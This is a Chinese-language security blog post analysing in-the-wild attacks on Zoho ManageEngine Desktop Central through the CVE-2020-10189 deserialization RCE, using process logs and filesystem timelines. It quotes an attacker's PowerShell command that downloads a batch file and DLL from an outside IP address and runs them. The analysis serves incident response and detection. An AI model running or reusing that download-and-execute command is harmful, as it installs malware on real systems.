admin

Desktop Central服务器RCE漏洞在野攻击分析

admin 安全防护 2022-11-23 430浏览 0

0x01 漏洞披露 在研究Desktop Central漏洞的过程中,我们在推特上找到了一位研究人员的帖子,该研究人员于2020年3月5日披露了Desktop Central的RCE漏洞。 Zoho ManageEngine Desktop Central 10允许远程执行代码,漏洞成因是FileStorage类的getChartImage中的不可信数据反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有关。 对CVE-2020-10189的研究还显示,可以在​​Shodan​​上搜索易受攻击的Desktop Central服务器。 在公网发现的威胁是有可疑的PowerShell下载通讯录,该通讯录包含下载文件的说明。 最早威胁活动之一是一些可疑的PowerShell下载命令。该命令包含指令,以下载install.bat并storesyncsvc.dll到C:\Windows\Temp,然后立即执行install.bat(图3)。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
esktop Central服务器RCE漏洞在野攻击分析

图3-可疑的PowerShell下载命令 该install.bat脚本包含storesyncsvc.dll作为服务安装在系统上的说明。(图4)。 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图4-Install.bat的内容 在运行PowerShell命令后,我们观察到安装了服务名称StorSyncSvc和显示名称为Storage Sync Service(图5)的新服务。 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图5-安装Storage Sync Service VirusTotal上的查询结果表明,一些检测引擎已经归类storesyncsvc.dll为恶意软件。 ​​https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details​​ 0x02 利用过程跟踪识别漏洞利用 此RCE漏洞已于2020年3月5日通过Twitter公开。 回顾Sysmon流程创建事件,表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是负责执行PowerShell Download命令的流程(图6)。 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图6-ParentImage负责PowerShell的下载 查看内存中的进程,我们还观察到Desktop Central java.exe应用程序cmd.exe和2.exe之间的父/子进程关系(图7)。 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图7- java.exe父/子进程关系 0x03 利用文件系统识别漏洞利用 为了进一步验证我们的理论,我们将从受影响的Desktop Central服务器收集的信息与已发布的POC进行了比较,确定攻击者可能利用了CVE-2020-10189漏洞在此易受攻击的系统上运行代码。 通过文件系统时间轴分析,我们确定遍历文件写可能已在具有文件名_chart(图8)和logger.zip(图9)的系统上发生 。 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图8- _chart文件系统分析 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图9- logger.zip文件系统分析 这些文件名也在​​@Steventseeley​​​发布的POC中进行了​​引用​​(图10)。 ​Desktop Central服务器RCE漏洞在野攻击分析​ 图10-POC中对_chart和logger.zip的引用,

继续浏览有关 安全 的文章
发表评论